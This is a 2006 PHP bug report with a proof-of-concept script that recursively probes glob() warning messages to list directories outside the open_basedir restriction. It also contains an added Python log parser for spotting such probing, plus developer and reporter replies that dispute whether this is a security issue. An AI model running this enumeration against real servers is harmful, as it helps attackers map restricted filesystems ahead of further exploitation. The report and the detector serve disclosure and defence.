Bug #39339 Bug in warning message when glob() function access to unallowed path.
Submitted: 2006-11-01 22:30 UTC Modified: 2006-11-03 21:22 UTC
From: anton dot kirsanov at gmail dot com Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.1.6 OS: ALL
Private report: No CVE-ID: None
 [2006-11-01 22:30 UTC] anton dot kirsanov at gmail dot com
Description:
------------
When open_basedir is enabled, the glob() function doesn't show files in unallowed directories; however, the warning message contains the name of the file or directory to which access is denied.
If you recursively parse the warning messages to extract paths, you get a listing of unallowed directories (see POC code).

I tested this bug on PHP 5.1.6 and 4.4.4; the result is the same everywhere.

Reproduce code:
---------------
<?php
	// -----------------------------------------------------
	// POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com )
	// 
	// Description:
	// Bug in warning message for glob() function allow show listing unallowed directories when open_basedir is enabled.
        //
	// Risk:
	// Possible directory listing, when open_basedir is enabled.
	// Testing on PHP 4.4.4, 5.1.6.

	
	error_reporting(E_ALL); 
	ini_set("display_errors", 0); 
	ini_set("track_errors", 1); 

	if(!ini_get('open_basedir'))	
		die('open_basedir not present');

	$chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$z = array();

	get_c("/", $z);

        // show contents of root directory
	print_r($z);

	function get_c($path, &$o)
	{
		global $chars;
		for($i=0; $i < strlen($chars); $i++)
		{
			$p = $path . $chars[$i];
			$r = glob($p . "*");
			if(!$r && $php_errormsg)
			{
				if((	preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) ||
					preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]])
				{
					$o[$t[1]] = $t[2];
					get_c($p, $o);
				}
			}
		}
	}
?>

Expected result:
----------------
<?php
glob("/*");
?>

Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/) owned ...


Actual result:
--------------
<?php
glob("/*");
?>

----
Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/bin/) owned ...
----

The warning message has disclosed the path - /bin/
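
For defenders, the probing described in this report leaves a trail in the PHP error log when log_errors is on. The following added example (not part of the original report and not PHP project code) groups open_basedir warnings by calling script and flags scripts that hit many distinct denied paths; the log lines, file paths and the min_distinct threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in PHP error-log format (not taken from the report).
SAMPLE_LOG = """\
[01-Nov-2006 22:30:01 UTC] PHP Warning:  glob(): open_basedir restriction in effect. File(/bin/) is not within the allowed path(s): (/var/www/site) in /var/www/site/tmp/x.php on line 34
[01-Nov-2006 22:30:01 UTC] PHP Warning:  glob(): open_basedir restriction in effect. File(/boot/) is not within the allowed path(s): (/var/www/site) in /var/www/site/tmp/x.php on line 34
[01-Nov-2006 22:30:01 UTC] PHP Warning:  glob(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/var/www/site) in /var/www/site/tmp/x.php on line 34
[01-Nov-2006 22:30:02 UTC] PHP Warning:  glob(): open_basedir restriction in effect. File(/etc/) is not within the allowed path(s): (/var/www/site) in /var/www/site/tmp/x.php on line 34
[01-Nov-2006 22:30:02 UTC] PHP Warning:  glob(): open_basedir restriction in effect. File(/etc/) is not within the allowed path(s): (/var/www/site) in /var/www/site/tmp/x.php on line 34
[01-Nov-2006 22:31:10 UTC] PHP Warning:  fopen(): open_basedir restriction in effect. File(/tmp/up.dat) is not within the allowed path(s): (/var/www/site) in /var/www/site/upload.php on line 12
[01-Nov-2006 22:31:11 UTC] PHP Notice:  Undefined index: id in /var/www/site/index.php on line 7
"""

# Standard open_basedir warning: denied path, allowed list, calling script, line.
DENIED = re.compile(
    r"open_basedir restriction in effect\. File\((?P<path>.*?)\) "
    r"is not within the allowed path\(s\): \((?P<allowed>.*?)\) "
    r"in (?P<script>.+?) on line (?P<line>\d+)"
)

def denied_paths_by_script(log_text):
    """Map each calling script to the set of distinct denied paths it triggered."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = DENIED.search(line)
        if m:
            seen[m.group("script")].add(m.group("path"))
    return dict(seen)

def flag_enumeration(log_text, min_distinct=3):
    """Return scripts whose count of distinct denied paths suggests probing.

    min_distinct is an assumed threshold; tune it against normal traffic.
    """
    return {
        script: sorted(paths)
        for script, paths in denied_paths_by_script(log_text).items()
        if len(paths) >= min_distinct
    }

if __name__ == "__main__":
    for script, paths in flag_enumeration(SAMPLE_LOG).items():
        print(f"{script}: {len(paths)} distinct denied paths: {paths}")
```

Counting distinct paths rather than raw warnings keeps a script that repeatedly fails on one misconfigured path from being flagged.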

 [2006-11-03 19:40 UTC] iliaa@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

Every time PHP fails to open a file due to safe_mode/
open_basedir it returns an error saying cannot open so & so 
due to safe_mode. 

You don't gain the ability to write to files and/or open them, 
so there is no security issue here.
 [2006-11-03 21:22 UTC] anton dot kirsanov at gmail dot com
Sorry, this is a bug.
If I know the full path to files in unallowed directories, I must use many other PHP bugs (some curl bug, the zlib compressed file read bug) to read unallowed files. This is a design bug in the security architecture.
 
Last updated: Tue Jul 01 21:01:35 2025 UTC